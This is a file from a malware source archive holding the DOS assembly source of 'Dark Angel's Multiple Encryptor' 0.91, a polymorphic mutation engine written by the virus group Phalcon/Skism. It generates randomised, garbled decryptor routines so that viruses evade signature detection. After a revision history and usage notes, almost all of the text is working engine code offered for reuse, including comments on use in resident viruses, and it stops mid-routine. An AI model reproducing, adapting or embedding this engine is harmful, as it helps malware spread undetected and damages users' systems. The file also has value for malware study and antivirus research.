MalwareSourceCode/MSDOS/D-Index/Virus.MSDOS.Unknown.dame091.asm

1555 lines
61 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
comment #
Dark Angel's Multiple Encryptor
Version 0.91
By Dark Angel of Phalcon/Skism
This source may be freely distributed. Modifications are
encouraged and modified redistribution is allowed provided
this notice and the revision history to date are not altered.
You are free to append to the revision history and update the
usage information.
Welcome to the source code for Dark Angel's Multiple Encryptor.
I, Dark Angel, will be your host for this short excursion through
a pretty nifty encryptor.
DAME 0.90 (1574 bytes)
~~~~ ~~~~ ~~~~~~~~~~~~
Initial release.
DAME 0.91 (1960 bytes)
~~~~ ~~~~ ~~~~~~~~~~~~
Source code commented.
The user no longer needs to call the encryption routine manually;
the routine calls it automatically. This makes DAME a bit more
"user friendly."
Garbling with two pointer registers simultaneously, i.e. [bx+di+offset]
is now supported.
Added "double-reference" encryptions. Example:
mov ax,[bx+3212]
xor ax,3213
mov [bx+3212],ax
There is now a bitflag option to generate a decryptor which will transfer
control to the buffer on a paragraph boundary.
There is now a 1% chance that no encryption will be encoded when
the "do_encrypt1" routine is called. Of course, null effect
encryptors may still be generated.
garble_jmpcond is much more robust. It can now put valid instructions
between the conditional jump and the target of the jump. Therefore,
there is no longer a multitude of JZ $+2's and the like. Instead, they
are replaced by JZ $+4, XOR BX,BX, for example.
The register tracker is cleared after the loop is completed. This makes
sense, since the registers are no longer needed. This also allows for the
manipulation of those used registers in the garbling after the loop is
completed.
Encoding routines enhanced: Two-byte PUSHes and POPs and four-byte register
MOVes added. Memory PUSHes and POPs are now supported.
The maximum nesting value is now the variable _maxnest, which can range
from 0 to MAXNEST. _maxnest is determined randomly at runtime. This makes
the decryption routines a bit more interesting. _nest is also cleared more
times during the run so that variability is continuous throughout.
Short decryptor option added. This is automatically used when generating
the encryptor so the encryptor will always be of minimal length.
More alignments are now possible. This makes the initial values of the
registers more flexible.
BUG FIXES:
BP is now preserved on exit
Prefetch queue flushed on backwards encryption; 386+ hangs eliminated.
See routine named "clear_PIQ"
Loopnz routines had possibility of not working properly; instruction
eliminated.
NOTES:
I forgot to give credit to the person from whom I stole the random number
routines. I took them from the routine embedded in TPE 1.x (I misremember
the version number). Many thanks to Masud Khafir!
USAGE:
ON ENTRY:
ax = flags
bit 15 : Use two registers for pointer : 0 = no, 1 = yes
bit 14 : Align size : 0 = word, 1 = dword
bit 13 : Encryption direction : 0 = forwards, 1 = backwards
bit 12 : Counter direction : 0 = forwards, 1 = backwards
bit 11 : Counter register used : 0 = no, 1 = yes
bit 10 : Temporary storage for double reference
bit 9 : Unused
bit 8 : Unused
bit 7 : Unused
bit 6 : Unused
bit 5 : Unused
bit 4 : Unused
bit 3 : return control on paragraph boundary : 1 = yes, 0 = no
bit 2 : short decryptor : 1 = yes, 0 = no (implies no garbling)
bit 1 : garble : 1 = yes, 0 = no
bit 0 : SS = DS = CS : 1 = yes, 0 = no
bx = start decrypt in carrier file
cx = encrypt length
dx = start encrypt
si = buffer to put decryption routine
di = buffer to put encryption routine
ds = cs on entry
es = cs on entry
RETURNS:
cx = decryption routine length
DF cleared
all other registers are preserved.
The RADIX is set to 16d.
NOTES:
rnd_init_seed is _not_ called by DAME. The user must explicitly call it.
The buffer containing the routine to be encrypted should be 20 bytes
larger than the size of the routine. This allows padding to work.
The decryption routine buffer should be rather large to accomodate the
large decryptors which may be generated.
The encryption routine buffer need not be very large; 80h bytes should
suffice. 90d bytes is probably enough, but this value is untested.
#
.radix 10h
ifndef vars
vars = 2
endif
if not vars eq 1 ; if (vars != 1)
_ax = 0
_cx = 1
_dx = 2
_bx = 3
_sp = 4
_bp = 5
_si = 6
_di = 7
_es = 8
_cs = 9
_ss = 0a
_ds = 0bh
; The constant MAXNEST determines the maximum possible level of nesting
; possible in any generated routine. If the value is too large, then
; recursion problems will cause a stack overflow and the program will
; crash. So don't be too greedy. 0Ah is a safe value to use for non-
; resident viruses. Use smaller values for resident viruses.
ifndef MAXNEST ; User may define MAXNEST prior to including
MAXNEST = 0a ; the DAME source code. The user's value will
endif ; then take precedence
rnd_init_seed:
push dx cx bx
mov ah,2C ; get time
int 21
in al,40 ; port 40h, 8253 timer 0 clock
mov ah,al
in al,40 ; port 40h, 8253 timer 0 clock
xor ax,cx
xor dx,ax
jmp short rnd_get_loop_done
get_rand:
push dx cx bx
in al,40 ; get from timer 0 clock
db 5 ; add ax, xxxx
rnd_get_patch1 dw 0
db 0BA ; mov dx, xxxx
rnd_get_patch2 dw 0
mov cx,7
rnd_get_loop:
shl ax,1
rcl dx,1
mov bl,al
xor bl,dh
jns rnd_get_loop_loc
inc al
rnd_get_loop_loc:
loop rnd_get_loop
rnd_get_loop_done:
mov rnd_get_patch1,ax
mov rnd_get_patch2,dx
mov al,dl
pop bx cx dx
retn
reg_table1:
; reg1 reg2 mod/00/rm This is used to handle memory addressing
db _bx, 84, 10000111b ; of the form [reg1+reg2+xxxx]
db _bp, 84, 10000110b ; if (reg2 == 84)
db _di, 84, 10000101b ; reg2 = NULL;
db _si, 84, 10000100b
db _bp, _di, 10000011b
db _bp, _si, 10000010b
db _bx, _di, 10000001b
db _bx, _si, 10000000b
db _di, _bp, 10000011b
db _si, _bp, 10000010b
db _di, _bx, 10000001b
db _si, _bx, 10000000b
aligntable db 3,7,0bh,0f,13,17,1bh,1f ; possible alignment masks
redo_dame:
pop di bp si dx cx bx ax
dame: ; Dark Angel's Multiple Encryptor
cld
push ax bx cx dx si bp di
call _dame
pop di
push cx di
call di
pop di cx bp si dx bx bx ax
ret
_dame: ; set up initial values of the variables
cld
push ax
mov ax,offset _encryptpointer
xchg ax,di ; save the pointer to the
stosw ; encryption routine buffer
xchg si,ax ; also save the pointer to
stosw ; the decryption routine
; buffer in the same manner
stosw
xchg ax,dx ; starting offset of
stosw ; encryption
xchg ax,bx ; starting offset of
stosw ; decryption routine
xchg cx,dx ; dx = encrypt size
xor ax,ax
mov cx,(endclear1 - beginclear1) / 2; clear additional data
rep stosw ; area
call get_rand ; get a random number
and ax,not 0f ; clear user-defined bits
pop cx ; cx = bitmask
xor cx,ax ; randomize top bits
call get_rand_bx ; get a random number
and bx,7 ; and lookup in the table
mov al,byte ptr [bx+aligntable] ; for a random rounding size
cbw
add dx,ax ; round the encryption
not ax ; size to next word, dword,
and dx,ax ; etc.
mov ax,dx ; save the new encryption
stosw ; length (_encrypt_length)
shr ax,1 ; convert to words
test ch,40 ; encrypting double wordly?
jz word_encryption ; nope, only wordly encryption
shr ax,1 ; convert to double words
word_encryption: ; all the worldly encryption
test ch,10 ; shall do thee no good, my
jnz counter_backwards ; child, lest you repent for
neg ax ; the sins of those who would
counter_backwards: ; bring harm unto others
stosw ; save _counter_value
push dx ; Save rounded length
call get_rand ; get a random value for the
stosw ; encryption value
; (_decrypt_value)
pop ax ; get rounded encryption length
; in bytes
test ch,20 ; is the encryption to run
jnz encrypt_forwards ; forwards or backwards?
neg ax ; Adjust for forwards
encrypt_forwards:
xor bx,bx ; Assume pointer_value2 = 0
test ch,80 ; Dual pointer registers?
jz no_dual
call get_rand_bx
sub ax,bx
no_dual:stosw ; Save the pointers to the
xchg ax,bx ; decryption (_pointer_value1
stosw ; and _pointer_value2)
; The following lines determine the registers that go with each function.
; There are a maximum of four variable registers in each generated
; encryption/decryption routine pair -- the counter, two pointer registers,
; and an encryption value register. Only one pointer register need be present
; in the pair; the other three registers are present only if they are needed.
s0: call clear_used_regs
mov di,offset _counter_reg
mov al,84 ; Assume no counter register
test ch,8 ; Using a counter register?
jz s1
call get_rand ; get a random initial value
mov _pointer_value1,ax ; for the pointer register
call get_another ; get a counter register
s1: stosb ; Store the counter register
xchg ax,dx
mov al,84 ; Assume no encryption register
call one_in_two ; 50% change of having an
js s2 ; encryption register
; Note: This merely serves as
; an extra register and may or
; may not be used as the
; encryption register.
call get_another ; get a register to serve as
s2: stosb ; the encryption register
cmp ax,dx ; normalise counter/encryption
ja s3 ; register pair so that the
xchg ax,dx ; smaller one is always in the
s3: mov ah,dl ; high byte
cmp ax,305 ; both BX and BP used?
jz s0 ; then try again
cmp ax,607 ; both SI and DI used?
jz s0 ; try once more
s4: mov si,offset reg_table1 ; Use the table
mov ax,3 ; Assume one pointer register
test ch,80 ; Using two registers?
jz use_one_pointer_reg
add si,4*3 ; Go to two register table
add al,4 ; Then use appropriate mask
use_one_pointer_reg:
call get_rand_bx ; Get a random value
and bx,ax ; Apply mask to it
add si,bx ; Adjust table offset
add bx,bx ; Double the mask
add si,bx ; Now table offset is right
lodsw ; Get the random register pair
mov bx,ax ; Check if the register in the
and bx,7 ; low byte is already used
cmp byte ptr [bx+_used_regs],0
jnz s4 ; If so, try again
mov bl,ah ; Otherwise, check if there is
or bl,bl ; a register in the high byte
js s5 ; If not, we are done
cmp byte ptr [bx+_used_regs],0 ; Otherwise, check if it is
jnz s4 ; already used
s5: stosw ; Store _pointer_reg1,
movsb ; _pointer_reg2, and
; _pointer_rm
calculate_maxnest:
call get_rand ; Random value for _maxnest
and al,0f ; from 0 to MAXNEST
cmp al,MAXNEST ; Is it too large?
ja calculate_maxnest ; If so, try again
stosb ; Otherwise, we have _maxnest
call clear_used_regs ; mark no registers used
encode_setup: ; encode setup portion
mov di,_decryptpointer ; (pre-loop) of the routines
call twogarble ; start by doing some garbling
; on the decryption routine
mov si,offset _counter_reg ; now move the initial
push si ; values into each variable
encode_setup_get_another: ; register -- encode them in a
call get_rand_bx ; random order for further
; variability
and bx,3 ; get a random register to en-
mov al,[si+bx] ; code, i.e. counter, pointer,
cbw ; or encryption value register
test al,80 ; is it already encoded?
jnz encode_setup_get_another ; then get another register
or byte ptr [bx+_counter_reg],80 ; mark it encoded in both the
mov si,ax ; local and
inc byte ptr [si+_used_regs] ; master areas
add bx,bx ; convert to word offset
mov dx,word ptr [bx+_counter_value] ; find value to set the
; register to
mov _nest,0 ; clear the current nest count
call mov_reg_xxxx ; and encode decryption routine
; instruction
call twogarble ; garble it some more
call swap_decrypt_encrypt ; now work on the encryption
; routine
push cx ; save the current bitmap
and cl,not 7 ; encode short routines only
call _mov_reg_xxxx ; encode the encryption routine
; instruction
pop cx ; restore bitmap
mov _encryptpointer,di ; return attention to the
; decryption routine
pop si
mov dx,4
encode_setup_check_if_done: ; check if all the variables
; have been encoded
lodsb ; get the variable
test al,80 ; is it encoded?
jz encode_setup ; nope, so continue encoding
dec dx ; else check the next variable
jnz encode_setup_check_if_done ; loop upwards
mov si,offset _encryptpointer ; Save the addresses of the
mov di,offset _loopstartencrypt ; beginning of the loop in
movsw ; the encryption and decryption
movsw ; routines
; Encode the encryption/decryption part of loop
mov _relocate_amt,0 ; reset relocation amount
call do_encrypt1 ; encode encryption
test ch,40 ; dword encryption?
jz dont_encrypt2 ; nope, skip
mov _relocate_amt,2 ; handle next word to encrypt
call do_encrypt1 ; and encrypt!
dont_encrypt2:
; Now we are finished encoding the decryption part of the loop. All that
; remains is to encode the loop instruction, garble some more, and patch
; the memory manipulation instructions so they encrypt/decrypt the proper
; memory locations.
mov bx,offset _loopstartencrypt ; first work on the encryption
push cx ; save the bitmap
and cl,not 7 ; disable garbling/big routines
call encodejmp ; encode the jmp instruction
pop cx ; restore the bitmap
mov ax,0c3fc ; cld, ret ; encode return instruction
stosw ; in the encryption routine
mov si,offset _encrypt_relocator ; now fix the memory
mov di,_start_encrypt ; manipulation instructions
push cx ; cx is not auto-preserved
call relocate ; fix address references
pop cx ; restore cx
mov bx,offset _loopstartdecrypt ; Now work on decryption
call encodejmp ; Encode the jmp instruction
push di ; Save the current pointer
call clear_used_regs ; Mark all registers unused
pop di ; Restore the pointer
call twogarble ; Garble some more
test cl,8 ; Paragraph alignment on
jnz align_paragraph ; entry to virus?
test ch,20 ; If it is a backwards
jz no_clear_prefetch ; decryption, then flush the
call clear_PIQ ; prefetch queue (for 386+)
no_clear_prefetch: ; Curse the PIQ!!!!!
call twogarble ; Garble: the final chapter
jmp short PIQ_done
align_paragraph:
mov dx,di ; Get current pointer location
sub dx,_decryptpointer2 ; Calculate offset when control
add dx,_start_decrypt ; is transfered to the carrier
inc dx ; Adjust for the JMP SHORT
inc dx
neg dx
and dx,0f ; Align on the next paragraph
cmp dl,10-2 ; Do we need to JMP?
jnz $+7 ; Yes, do it now
test ch,20 ; Otherwise, check if we need
jz PIQ_done ; to clear the prefetch anyway
call clear_PIQ_jmp_short ; Encode the JMP SHORT
PIQ_done:
mov _decryptpointer,di
mov si,offset _decrypt_relocator ; Calculate relocation amount
sub di,_decryptpointer2
add di,_start_decrypt
relocate:
test ch,20 ; Encrypting forwards or
jz do_encrypt_backwards ; backwards?
add di,_encrypt_length ; Backwards is /<0oI_
do_encrypt_backwards: ; uh huh uh huh uh huh
sub di,_pointer_value1 ; Calculate relocation amount
sub di,_pointer_value2
mov cx,word ptr [si-2] ; Get relocation count
jcxz exit_relocate ; Exit if nothing to do
xchg ax,di ; Otherwise we be in business
relocate_loop: ; Here we go, yo
xchg ax,di
lodsw ; Get address to relocate
xchg ax,di
add [di],ax ; Relocate mah arse!
loop relocate_loop ; Do it again 7 times
exit_relocate: ; ('cause that makes 8)
mov di,_decryptpointer ; Calculate the decryption
mov cx,di ; routine size to pass
sub cx,_decryptpointer2 ; back to the caller
ret
encodejmp:
mov di,word ptr [bx+_encryptpointer-_loopstartencrypt]
push bx
mov _nest,0 ; Reset nest count
mov al,_pointer_reg1 ; Get the pointer register
and ax,7 ; Mask out any modifications
mov dx,2 ; Assume word encryption
test ch,40 ; Word or Dword?
jz update_pointer1
shl dx,1 ; Adjust for Dword encryption
update_pointer1:
test ch,20 ; Forwards or backwards?
jz update_pointer2
neg dx ; Adjust for backwards
update_pointer2:
test ch,80 ; Are there two pointers?
jz update_pointer_now ; Continue only if so
sar dx,1 ; Halve the add value
push ax ; Save register to add
call add_reg_xxxx ; Add to first register
mov al,_pointer_reg2
and ax,7 ; Add to the second pointer
call add_reg_xxxx ; register
pop bx
test ch,8 ; Using a counter register?
jnz update_pointer_done ; If not, continue this
push bx ; Save first register
xchg ax,dx ; Move second register to DX
call get_another ; Get new register regX
call mov_reg_reg ; MOV regX, _pointer_reg2
pop dx ; Restore first register
call add_reg_reg ; ADD regX, _pointer_reg1
call clear_reg ; Clear the temp register
jmp short update_pointer_done ; Skip adjustment of pointer
; register (already done)
update_pointer_now:
call add_reg_xxxx ; Adjust pointer register
update_pointer_done:
mov dl,75 ; Assume JNZ
mov al,_counter_reg ; Is there a counter register?
and ax,7
cmp al,_sp
jz do_jnz
push dx ; Save JNZ
mov dx,1 ; Assume adjustment of one
test ch,10 ; Check counter direction
jz go_counter_forwards ; If forwards, increment the
; counter
cmp al,_cx ; Check if the counter is CX
jnz regular ; If not, then decrement the
; counter and continue
call one_in_two ; Otherwise, there is a 50%
js regular ; chance of using a LOOP
pop dx
mov dl,0e2 ; let us encode the LOOP
jmp short do_jnz
regular:neg dx
go_counter_forwards:
call add_reg_xxxx ; Adjust counter register
pop dx
do_jnz: pop bx
mov ax,[bx] ; Calculate value to JNZ/LOOP
sub ax,di ; back
dec ax
dec ax
xchg ah,al ; Value is in AL
mov al,dl ; jnz
or ah,ah ; Value >= 128? If so, it is
js jmplocation_okay ; impossible to JNZ/LOOP there
; due to stupid 8086 limitation
pop ax ax ; Take return locations off
jmp redo_dame ; the stack and encode again
jmplocation_okay:
stosw ; Encode JNZ/LOOP instruction
mov word ptr [bx+_encryptpointer-_loopstartencrypt],di
ret ; Save current location
encryption:
; This routine encodes the instruction which actually manipulates the memory
; location pointed to by the pointer register.
and ch,not 4 ; Default = no double reference
call one_in_two ; But there is a 50% chance of
js not_double_reference ; using a double reference
or ch,4 ; Yes, we are indeed using it
not_double_reference:
mov di,_decryptpointer ; Set the registers to work
mov bp,offset _decrypt_relocate_num ; with the decryption routine
call twogarble ; Insert some null instructions
xor ax,ax ; Get the value for the rm
mov al,_pointer_rm ; field corresponding to the
; pointer register/s used
call choose_routine ; Get random decryption type
call go_next ; to DX, BX, SI
push si dx si dx ; Save crypt value/register
; and crypt pointer
;; mov _nest,0 ; not needed - choose_routine does it
test ch,4
jz not_double_reference1 ; Double reference?
xchg ax,dx ; Pointer register/s to dx
call get_another ; Unused register to AX (reg1)
call mov_reg_reg ; MOV reg1,[pointer]
mov _kludge,dx ; Store the pointer register
not_double_reference1:
pop dx si ; Restore decryption pointer
call handle_jmp_table ; Encode decryption routine
push bx ; Save routine that was used
call twogarble ; Garble some more for fun
test ch,4
jz not_double_reference2 ; Double reference?
xchg ax,dx ; reg1 to dx
mov ax,_kludge ; Restore pointer
push ax ; Save pointer
call mov_reg_reg ; MOV [pointer],reg1
call clear_reg_dx ; Return reg1 to free pool
pop ax ; Restore pointer
not_double_reference2:
mov bp,offset _encrypt_relocate_num ; Set the registers to work
call swap_decrypt_encrypt ; with the encryption routine
pop bx dx si ; Restore crypt value/register
call go_next ; Convert to encryption table
jmp short finish_encryption ; and encode the encryption
; corresponding to the
; decryption
do_encrypt1: ; Perform encryption on a word
call playencrypt ; Alter encryption value
call get_rand ; Have a tiny chance
cmp ax,6 ; (1% chance) of not
jb playencrypt ; encrypting at all
call encryption ; Encrypt!
playencrypt: ; Update the encryption value
mov di,_decryptpointer
call twogarble
mov al,_encrypt_reg ; Encryption register used?
and ax,7
cmp al,4
jz swap_decrypt_encrypt
call get_rand_bx ; 75% chance of altering the
cmp bl,0c0 ; encryption value register
ja swap_decrypt_encrypt ; Exit if nothing is to occur
call choose_routine ; Select a method of updating
call handle_jmp_table_nogarble ; Encode the decryption
call swap_decrypt_encrypt ; Now work on encryption
finish_encryption:
push cx ; Save current bitmask
and cl,not 7 ; Turn off garbling/mo routines
call [bx+si+1] ; Encode the same routine for
; the encryption
pop cx ; Restore the bitmask
mov _encryptpointer,di
ret
choose_routine:
mov _nest,0 ; Reset recursion counter
call one_in_two ; 50% chance of using an
js get_used_register ; already used register as
; an update value
call get_rand_bx ; Get random number as the
; update value
mov si,offset oneregtable ; Choose the update routine
; from this table
jmp short continue_choose_routine ; Saves one byte over
; xchg dx,bx / ret
get_used_register:
; This routine returns, in DX, a register whose value is known at the current
; point in the encryption/decryption routines. SI is loaded with the offset
; of the appropriate table. The routine destroys BX.
call get_rand_bx ; Get a random number
and bx,7 ; Convert to a register (0-7)
cmp bl,_sp ; Make sure it isn't SP; that
jz get_used_register ; is always considered used
cmp byte ptr [bx+_used_regs],0 ; Check if the register is
jz get_used_register ; currently in use
mov si,offset tworegtable ; Use routine from this table
continue_choose_routine:
xchg dx,bx ; Move value to dx
ret ; and quit
swap_decrypt_encrypt:
mov _decryptpointer,di ; save current pointer
push ax
mov al,_maxnest ; disable garbling
mov _nest,al
pop ax
mov di,_encryptpointer ; replace with encryption
ret ; pointer
go_next:
; Upon entry, SI points to a dispatch table. This routine calculates the
; address of the next table and sets SI to that value.
push ax
lodsb ; Get mask byte
cbw ; Convert it to a word
add si,ax ; Add it to the current
pop ax ; location (table+1)
inc si ; Add two more to adjust
inc si ; for the mask
ret ; (mask = size - 3)
clear_used_regs:
xor ax,ax ; Mark registers unused
mov di,offset _used_regs ; Alter _used_regs table
stosw
stosw
inc ax ; Mark SP used
stosw
dec ax
stosw
ret
get_another: ; Get an unused register
call get_rand ; Get a random number
and ax,7 ; convert to a register
; cmp al,_sp
; jz get_another
mov si,ax
cmp [si+_used_regs],0 ; Check if used already
jnz get_another ; Yes, try again
inc [si+_used_regs] ; Otherwise mark the register
ret ; used and return
clear_reg_dx: ; Mark the register in DX
xchg ax,dx ; unused
clear_reg: ; Mark the register in AX
mov si,ax ; unused
mov byte ptr [si+_used_regs],0
ret
free_regs:
; This checks for any free registers and sets the zero flag if there are.
push ax cx di
mov di,offset _used_regs
mov cx,8
xor ax,ax
repne scasb
pop di cx ax
ret
one_in_two: ; Gives 50% chance of
push ax ; something happening
call get_rand ; Get a random number
or ax,ax ; Sign flag set 50% of the
pop ax ; time
ret
get_rand_bx: ; Get a random number to BX
xchg ax,bx ; Save AX
call get_rand ; Get a random number
xchg ax,bx ; Restore AX, set BX to the
return: ; random number
ret
garble_onebyte:
; Encode a single byte that doesn't do very much, i.e. sti, int 3, etc.
xchg ax,dx ; Get the random number in AX
and al,7 ; Convert to table offset
mov bx,offset onebytetable ; Table of random bytes
xlat ; Get the byte
stosb ; and encode it
ret
garble_jmpcond:
; Encode a random short conditional or unconditional JMP instruction. The
; target of the JMP is an unspecified distance away. Valid instructions
; take up the space between the JMP and the target.
xchg ax,dx ; Random number to AX
and ax,0f ; Convert to a random JMP
or al,70 ; instruction
stosw ; Encode it
push di ; Save current location
call garble ; May need to check if too large
mov ax,di ; Get current location
pop bx ; Restore pointer to the JMP
sub ax,bx ; Calculate the offset
mov byte ptr [bx-1], al ; Put it in the conditional
ret ; JMP
clear_PIQ:
; Encode instructions that clear the prefetch instruction queue.
; CALL/POP
; JMP SHORT
; JMP
call get_rand ; Get a random number
mov dl,ah ; Put high byte in DL
and dx,0f ; Adjust so JMP target is
; between 0 and 15 bytes away
and ax,3 ; Mask AX
jz clear_PIQ_call_pop ; 1/4 chance of CALL/POP
dec ax
jz clear_PIQ_jmp_short ; 1/4 chance of JMP SHORT
mov al,0e9 ; Otherwise do a straight JMP
clear_PIQ_word: ; Handler if offset is a word
stosb ; Store the JMP or CALL
xchg ax,dx ; Offset to AX
stosw ; Encode it
clear_PIQ_byte: ; Encode AX random bytes
push cx
xchg ax,cx ; Offset to CX
jcxz random_encode_done ; Exit if no bytes in between
random_encode_loop:
call get_rand ; Get a random number
stosb ; Store it and then do this
loop random_encode_loop ; again
random_encode_done:
pop cx
ret
clear_PIQ_jmp_short:
mov al,0ebh ; JMP SHORT
stosb ; Encode the instruction
xchg ax,dx
stosb ; and the offset
jmp short clear_PIQ_byte ; Encode intervening bytes
clear_PIQ_call_pop:
mov al,0e8 ; CALL
call clear_PIQ_word ; Encode instruction, garbage
call garble ; Garble some and then find
call get_another ; an unused register
call clear_reg ; keep it unused
jmp short _pop ; and POP into it
twogarble: ; Garble twice
mov _nest,0 ; Reset nest count
call garble ; Garble once
garble: ; ax, dx preserved ; Garble
call free_regs ; Are there any unused
jne return ; registers?
test cl,2 ; Is garbling enabled?
jz return ; Exit if not
push ax dx si
call get_rand ; Get a random number into
xchg ax,dx ; DX
call get_another ; And a random reg into AX
call clear_reg ; Don't mark register as used
mov si,offset garbletable ; Garble away
jmp short handle_jmp_table_nopush
handle_jmp_table: ; ax,dx preserved ; This is the master dispatch
call garble ; Garble before encoding
handle_jmp_table_nogarble: ; Encode it
push ax dx si
handle_jmp_table_nopush:
push ax
lodsb ; Get table mask
cbw ; Clear high byte
call get_rand_bx ; Get random number
and bx,ax ; Get random routine
pop ax
test cl,4 ; Short decryptor?
jnz doshort ; If so, use first routine
inc _nest ; Update nest count
push ax
mov al,_maxnest
cmp _nest,al ; Are we too far?
pop ax
jb not_max_nest ; If so, then use the first
doshort:xor bx,bx ; routine in the table
not_max_nest:
push bx ; Save routine to be called
call [bx+si] ; Call the routine
pop bx si dx ax
ret
garble_tworeg:
; Garble unused register with the contents of a random register.
mov si,offset tworegtable ; Use reg_reg table
and dx,7 ; Convert to random register #
jmp short handle_jmp_table_nogarble ; Garble away
garble_onereg:
; Garble unused register with a random value (DX).
mov si,offset oneregtable ; Point to the table
jmp short handle_jmp_table_nogarble ; and garble
_push: ; Encode a PUSH
or al,al ; PUSHing memory register?
js _push_mem
call one_in_two ; 1/2 chance of two-byte PUSH
js _push_mem
add al,50 ; otherwise it's really easy
stosb
ret
_push_mem:
add ax,0ff30
jmp short go_mod_xxx_rm1
_pop: ; Encode a POP
or al,al ; POPing a memory register?
js _pop_mem
call one_in_two ; 1/2 chance of two-byte POP
js _pop_mem
add al,58
stosb
ret
_pop_mem:
mov ah,8f
go_mod_xxx_rm1:
jmp mod_xxx_rm
mov_reg_xxxx: ; ax and dx preserved
mov si,offset mov_reg_xxxx_table
go_handle_jmp_table1:
jmp short handle_jmp_table
_mov_reg_xxxx_mov_add:
call get_rand_bx ; Get a random number
push bx ; Save it
sub dx,bx ; Adjust MOV amount
call mov_reg_xxxx ; MOV to register
pop dx ; Get random number
jmp short go_add_reg_xxxx ; Add it to the register
_mov_reg_xxxx_mov_al_ah:
cmp al,_sp
jae _mov_reg_xxxx
push ax dx
call _mov_al_xx
pop dx ax
xchg dh,dl
jmp short _mov_ah_xx
_mov_reg_xxxx_mov_xor:
call get_rand_bx
push bx
xor dx,bx
call mov_reg_xxxx
pop dx
jmp xor_reg_xxxx
_mov_reg_xxxx_xor_add:
push dx
mov dx,ax
call xor_reg_reg
pop dx
go_add_reg_xxxx:
jmp add_reg_xxxx
_mov_reg_xxxx_mov_rol:
ror dx,1
call mov_reg_xxxx
jmp short _rol
_mov_reg_xxxx_mov_ror:
rol dx,1
call mov_reg_xxxx
_ror:
or al,8
_rol:
mov ah,0d1
jmp short go_mod_xxx_rm1
_mov_reg_xxxx:
call one_in_two ; 1/2 chance of a four byte MOV
js _mov_reg_xxxx1
add al,0B8
stosb
xchg ax,dx
stosw
ret
_mov_reg_xxxx1: ; Do the four byte register MOV
mov ah,0c7
jmp mod_xxx_rm_stosw
mov_ah_xx:
_mov_ah_xx:
add al,04
mov_al_xx:
_mov_al_xx:
add al,0B0
mov ah,dl
stosw
ret
mov_reg_reg: ; ax, dx preserved
mov si,offset mov_reg_reg_table
jmp short go_handle_jmp_table1
_mov_reg_reg_push_pop:
push ax
xchg dx,ax
call _push ; PUSH REG2
pop ax
jmp _pop ; POP REG1
_mov_reg_reg:
mov ah,08Bh
jmp short _mod_reg_rm_direction
mov_xchg_reg_reg:
call one_in_two
js mov_reg_reg
xchg_reg_reg: ; ax, dx preserved
mov si,offset xchg_reg_reg_table
go_handle_jmp_table2:
jmp short go_handle_jmp_table1
_xchg_reg_reg_push_pop:
push dx ax dx
call _push ; PUSH REG1
pop ax
call _push ; PUSH REG2
pop ax
call _pop ; POP REG1
pop ax
jmp _pop ; POP REG2
_xchg_reg_reg_3rd_reg:
call free_regs
jne _xchg_reg_reg
push dx ax
call get_another ; Get free register (reg3)
call mov_xchg_reg_reg ; MOV/XCHG REG3,REG2
pop dx
call xchg_reg_reg ; XCHG REG3,REG1
pop dx
xchg ax,dx
call mov_xchg_reg_reg ; MOV/XCHG REG2,REG3
jmp clear_reg_dx
_xchg_reg_reg:
or al,al
js __xchg_reg_reg
cmp al,dl
jg _xchg_reg_reg_skip
xchg al,dl
_xchg_reg_reg_skip:
or dl,dl
jz _xchg_ax_reg
__xchg_reg_reg:
xchg al,dl
mov ah,87
jmp short _mod_reg_rm
_xchg_ax_reg:
add al,90
stosb
ret
xor_reg_xxxx_xor_xor:
call get_rand_bx
push bx
xor dx,bx
call xor_reg_xxxx
pop dx
jmp short xor_reg_xxxx
xor_reg_xxxx:
mov si,offset xor_reg_xxxx_table
jmp short go_handle_jmp_table2
_xor_reg_xxxx:
or al,030
jmp _81h_
xor_reg_reg:
mov si,offset xor_reg_reg_table
go_handle_jmp_table3:
jmp short go_handle_jmp_table2
_xor_reg_reg:
mov ah,33
; The following is the master encoder. It handles most traditional encodings
; with mod/reg/rm or mod/xxx/rm.
_mod_reg_rm_direction:
or al,al ; If al is a memory pointer,
js dodirection ; then we need to swap regs
or dl,dl ; If dl is a memory pointer,
js _mod_reg_rm ; we cannot swap registers
call one_in_two ; Otherwise there is a 50%
js _mod_reg_rm ; chance of swapping registers
dodirection:
xchg al,dl ; Swap the registers and adjust
sub ah,2 ; the opcode to compensate
_mod_reg_rm:
shl al,1 ; Move al to the reg field
shl al,1
shl al,1
or al,dl ; Move dl to the rm field
mod_xxx_rm:
or al,al ; Is al a memory pointer?
js no_no_reg ; If so, skip next line
or al,0c0 ; Mark register in mod field
no_no_reg:
xchg ah,al
test ah,40
jnz exit_mod_reg_rm
test cl,1
jnz continue_mod_xxx_rm
push ax
mov al,2e
stosb
pop ax
continue_mod_xxx_rm:
stosw
mov si,cs:[bp] ; Store the patch location
add si,si ; for the memory in the
mov cs:[si+bp+2],di ; appropriate table for later
inc word ptr cs:[bp] ; adjustment
; cs: overrides needed for bp
mov al,_relocate_amt
cbw
exit_mod_reg_rm:
stosw
ret
add_reg_reg:
mov si,offset add_reg_reg_table
jmp short go_handle_jmp_table3
_add_reg_reg:
mov ah,3
jmp short _mod_reg_rm_direction
sub_reg_reg:
mov si,offset sub_reg_reg_table
go_handle_jmp_table4:
jmp short go_handle_jmp_table3
_sub_reg_reg:
mov ah,2bh
jmp short _mod_reg_rm_direction
_add_reg_xxxx_inc_add:
call inc_reg
dec dx
jmp short add_reg_xxxx
_add_reg_xxxx_dec_add:
call dec_reg
inc dx
jmp short add_reg_xxxx
_add_reg_xxxx_add_add:
call get_rand_bx
push bx
sub dx,bx
call add_reg_xxxx
pop dx
jmp short add_reg_xxxx
add_reg_xxxx1:
neg dx
add_reg_xxxx:
or dx,dx
jnz cont
return1:
ret
cont:
mov si,offset add_reg_xxxx_table
jmp go_handle_jmp_table4
_add_reg_xxxx:
or al,al
jz _add_ax_xxxx
_81h_:
or al,al
js __81h
add al,0c0
__81h:
mov ah,81
mod_xxx_rm_stosw:
call mod_xxx_rm
_encode_dx_:
xchg ax,dx
stosw
ret
_add_ax_xxxx:
mov al,5
_encode_al_dx_:
stosb
jmp short _encode_dx_
sub_reg_xxxx1:
neg dx
sub_reg_xxxx:
_sub_reg_xxxx:
or dx,dx ; SUBtracting anything?
jz return1 ; If not, we are done
or al,al ; SUB AX, XXXX?
jz _sub_ax_xxxx ; If so, we encode in 3 bytes
add al,028 ; Otherwise do the standard
jmp short _81h_ ; mod/reg/rm deal
_sub_ax_xxxx:
mov al,2dh
jmp short _encode_al_dx_
dec_reg:
push ax
